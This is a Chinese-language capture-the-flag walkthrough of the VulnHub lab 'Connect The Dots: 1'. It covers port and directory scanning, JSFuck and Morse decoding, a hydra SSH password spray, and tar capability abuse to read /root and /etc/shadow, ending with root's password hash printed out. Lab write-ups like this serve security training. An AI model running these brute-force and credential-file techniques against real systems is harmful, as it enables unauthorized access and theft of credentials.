Vulnhub Connect-The-Dots-1

2023年11月3日14:19:08评论27 views字数 3833阅读12分46秒阅读模式

title: Vulnhub-Connect-The-Dots-1
categories:
  - VulnHub
tags:
  - Linux
  - nmap
  - SSH
  - gobuster
  - exiftool
  - NFS
  - JavaScript
  - 摩斯密码
  - JSFucK
  - 密码爆破
  - hydra
  - FTP
  - html
cover: /images/Vulnhub.png
abbrlink: 6002ab39
date: 2023-02-09 10:18:02

0x01 靶机介绍

Name: Connect The Dots: 1
Date release: 21 Oct 2019
Author: Sumit Verma
Series: Connect The Dots
Level: Beginner-Intermediate
User flag: user.txt
Root flag: root.txt

靶机下载地址：

https://www.vulnhub.com/entry/connect-the-dots-1,384/

0x02 侦查

端口探测

首先使用 nmap 进行端口扫描

nmap -p- -sV -sC -A 192.168.0.105 -oA nmap_connect-the-dots-1

Vulnhub Connect-The-Dots-1

扫描结果显示目标开放了21、80、111、2049和7822端口，其中 rpcbind 中提供了 NFS 服务

80端口

访问http://192.168.0.105界面如下，内容为庆祝兄弟生日快乐，同时提示这两兄弟名字只有N和M的区别

Vulnhub Connect-The-Dots-1

目录扫描

使用 gobuster 进行目录扫描，成功找到mysite、backups目录

gobuster dir -u http://192.168.0.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

Vulnhub Connect-The-Dots-1

访问http://192.168.0.105/mysite发现存在目录遍历

Vulnhub Connect-The-Dots-1

访问http://192.168.0.105/backups则会直接下载备份文件

0x03 上线[norris]

NFS信息收集

查看目标的 NFS 挂载情况

showmount -e 192.168.0.105

Vulnhub Connect-The-Dots-1

创建新目录用于挂载目录/home/morris

mkdir nfsmount -t nfs 192.168.0.105:/home/morris nfs

尝试访问其中文件，但是当前权限不足

Vulnhub Connect-The-Dots-1

JS代码分析

在/mysites目录中下载并查看bootstrap.min.cs，而文件中的参数值采用 JSFuck 加密

more bootstrap.min.cs

Vulnhub Connect-The-Dots-1

同时在注册界面register.html的源代码中发现该文件被调用

Vulnhub Connect-The-Dots-1

在浏览器中的Console中执行命令拼接 JS 脚本提供的所有参数

console.log(b1+b2+b3+b4+b5+b6+b7+b8+b9+b10)

Vulnhub Connect-The-Dots-1

在解密网站上对拿到的密文进行破解

网站地址：

http://codertab.com/JsUnFuck

Vulnhub Connect-The-Dots-1

成功拿到字符串You're smart enough to understand me. Here's your secret, TryToGuessThisNorris@2k19，其中TryToGuessThisNorris@2k19可能为登录密码

SSH密码爆破

结合以上结果分析存在两个账号norris和morris，配合密码进行爆破

hydra -L user -p TryToGuessThisNorris@2k19 ssh://192.168.0.105 -s 7822

Vulnhub Connect-The-Dots-1

成功登录norris用户并在家目录下拿到第一个flag

ssh norris@192.168.0.105 -p 7822cat user.txt

Vulnhub Connect-The-Dots-1

0x04 权限提升[morris]

FTP信息收集

查看用户信息

cat /etc/passwd | grep -v nologin

Vulnhub Connect-The-Dots-1

查看 FTP 目录中的文件

cd /ftp/files && ls

Vulnhub Connect-The-Dots-1

当然也可以直接登录 FTP 并下载其中文件

ftp 192.168.0.105ftp > get game.jpg.bakftp > ...

Vulnhub Connect-The-Dots-1

使用命令查询文件的具体信息，在game.jpg.bak中发现摩斯密码

exiftool game.jpg.bakexiftool hits.txt.bak...

Vulnhub Connect-The-Dots-1

通过在线网站进行解码拿到解码后的结果，提示存在可公开访问的文件SECRETFILE

解密地址：

https://gchq.github.io/CyberChef/

.... . -.-- ....... -. --- .-. .-. .. ... --..-- ....... -.-- --- ..- .----. ...- . ....... -- .- -.. . ....... - .... .. ... ....... ..-. .- .-. .-.-.- ....... ..-. .- .-. ....... ..-. .- .-. ....... ..-. .-. --- -- ....... .... . .- ...- . -. ....... .-- .- -. -. .- ....... ... . . ....... .... . .-.. .-.. ....... -. --- .-- ..--.. ....... .... .- .... .- ....... -.-- --- ..- ....... ... ..- .-. . .-.. -.-- ....... -- .. ... ... . -.. ....... -- . --..-- ....... -.. .. -.. -. .----. - ....... -.-- --- ..- ..--.. ....... --- .... ....... -.. .- -- -. ....... -- -.-- ....... -... .- - - . .-. -.-- ....... .. ... ....... .- -... --- ..- - ....... - --- ....... -.. .. . ....... .- -. -.. ....... .. ....... .- -- ....... ..- -. .- -... .-.. . ....... - --- ....... ..-. .. -. -.. ....... -- -.-- ....... -.-. .... .- .-. --. . .-. ....... ... --- ....... --.- ..- .. -.-. -.- .-.. -.-- ....... .-.. . .- ...- .. -. --. ....... .- ....... .... .. -. - ....... .. -. ....... .... . .-. . ....... -... . ..-. --- .-. . ....... - .... .. ... ....... ... -.-- ... - . -- ....... ... .... ..- - ... ....... -.. --- .-- -. ....... .- ..- - --- -- .- - .. -.-. .- .-.. .-.. -.-- .-.-.- ....... .. ....... .- -- ....... ... .- ...- .. -. --. ....... - .... . ....... --. .- - . .-- .- -.-- ....... - --- ....... -- -.-- ....... -.. ..- -. --. . --- -. ....... .. -. ....... .- ....... .----. ... . -.-. .-. . - ..-. .. .-.. . .----. ....... .-- .... .. -.-. .... ....... .. ... ....... .--. ..- -... .-.. .. -.-. .-.. -.-- ....... .- -.-. -.-. . ... ... .. -... .-.. . .-.-.-

Vulnhub Connect-The-Dots-1

使用 find 命令寻找该文件，但由于权限问题查询失败

find / -name SECRETFILE -print 2>&1| grep -v "Permission denied"

最终在默认站点目录/var/www/html中成功找到

Vulnhub Connect-The-Dots-1

读取secretfile成功，但读取.secretfile.swp提示权限不足

Vulnhub Connect-The-Dots-1

通过 wget 下载并查看，成功拿到密码blehguessme090

wget http://192.168.0.105/.secretfile.swpstrings .secretfile.swp

Vulnhub Connect-The-Dots-1

SSH登录

利用以上密码成功登录 morris 用户

ssh morris@192.168.0.105 -s 7822

Vulnhub Connect-The-Dots-1

0x05 权限提升[root]

信息收集

使用 getcap 获取遍历程序文件所具有的能力，成功发现tar命令为 CAP_DAC_READ_SEARCH，即忽略文件读及目录搜索的DAC访问限制

/sbin/getcap -r / 2>/dev/null

Vulnhub Connect-The-Dots-1

但tar命令只有其属主和属组才能执行，恰好 norris 用户组是其属组

ls -la /usr/bin/tar

Vulnhub Connect-The-Dots-1

获取flag

利用 tar 命令打包/root目录并解压

cd /tmptar -zcvf root.tar.gz /roottar -zxvf root.tar.gz

Vulnhub Connect-The-Dots-1

在/tmp/root目录中成功拿到第二个flag

Vulnhub Connect-The-Dots-1

如果想要拿到 root 的密码哈希可打包/etc目录

tar -zcvf etc.tar.gz /etctar -zxvf etc.tar.gz

查看shadow

cd etcmore /shadow

Vulnhub Connect-The-Dots-1

root 用户的密码散列值如下

root:$6$DYYhzsqi6yNN6LHi$sFqgqKjfvWuRFbbf6YLVaRI3FgvDRpTFWPFxXm.vMh7rXTAQ1UbjkIYJG.KK5BaZeek9fbq9Yasb3H1LU4zDB0:1817

0x06 知识星球

Vulnhub Connect-The-Dots-1

原文始发于微信公众号（狐狸说安全）：Vulnhub Connect-The-Dots-1

左青龙
微信扫一扫

右白虎
微信扫一扫

Vulnhub Connect-The-Dots-1

0x01 靶机介绍

0x02 侦查

端口探测

80端口

目录扫描

0x03 上线[norris]

NFS信息收集

JS代码分析

SSH密码爆破

0x04 权限提升[morris]

FTP信息收集

SSH登录

0x05 权限提升[root]

信息收集

获取flag

0x06 知识星球

ebpf在Android安全上的应用：结合binder完成一个行为检测沙箱(下篇)

浅谈Kubernetes安全

若依系统恰分攻略

HW必备技能教学之Windows应急响应常见流程【附应急工具】

技术实践｜大模型内容安全蓝军的道与术

Weblogic SSRF漏洞（CVE-2014-4210）

Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

HACKADEMIC: RTB1靶场-复现

卡巴斯基引擎另类免杀玩法

任意文件读取rce记录

发表评论

在线咨询

微信